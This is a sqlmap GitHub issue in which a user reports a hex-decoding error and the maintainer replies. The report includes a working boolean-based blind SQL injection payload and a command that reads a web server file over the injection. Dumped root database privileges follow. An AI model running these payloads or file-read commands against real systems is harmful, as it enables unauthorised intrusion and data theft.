### ISSUE TITLE
 there was a problem decoding value ' ' from expected hexadecimal form

### ISSUE THREAD

**Issue by italy2010** [sqlmapproject/sqlmap#2206]
my target info

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order_id (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: order_id=(SELECT (CASE WHEN (1705=1705) THEN 1705 ELSE 1705*(SELECT 1705 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: Microsoft IIS 8.5, ASP
back-end DBMS: MySQL >= 5.0

my test
"http://site.test/?order_id=1" --hex   --dbs --threads 10  --is-dba --file-read=C:\Inetpub\wwwroot\Default.asp

current user is DBA:    True

when i want download files with sql injection technique i get this error

[04:34:03] [INFO] fingerprinting the back-end DBMS operating system
[04:34:03] [INFO] the back-end DBMS operating system is Windows
[04:34:03] [INFO] fetching file: 'C:/Inetpub/wwwroot/Default.asp'
[04:34:03] [INFO] retrieving the length of query output
[04:34:25] [INFO] retrieved: 2
[04:34:31] [INFO] retrieved:
[04:34:31] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file 'C:/Inetpub/wwwroot/Default.asp' has been successfully downloaded from the back-end DBMS file system? [Y/n]
[04:37:43] [INFO] retrieving the length of query output
[04:37:47] [INFO] retrieved: 2
[04:37:50] [INFO] retrieved:
[04:37:50] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] C:\Users\dodo\.sqlmap\output\site.test\files\C__Inetpub_wwwroot_Default.asp (size differs from remote file)

[04:37:50] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 24 times
[04:37:50] [INFO] fetched data logged to text files under 'C:\Users\dodo\.sqlmap\output\site.test'

[*] shutting down at 04:37:50

--------
database management system users privileges:
[*] %mysql.sys% [1]:
    privilege: USAGE
[*] %root% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
    privilege: \x03QE!TE VIEW

database management system users roles:
[*] %mysql.sys% [1]:
    role: USAGE
[*] %root% (administrator) [27]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
    role: \x03QE!TE VIEW
----------
i tested flush-session but not worked.

**Comment by stamparm** [comment]
You are getting junk as results. Please use --string in this kind of situations (boolean with junk). If that doesn't help nothing will
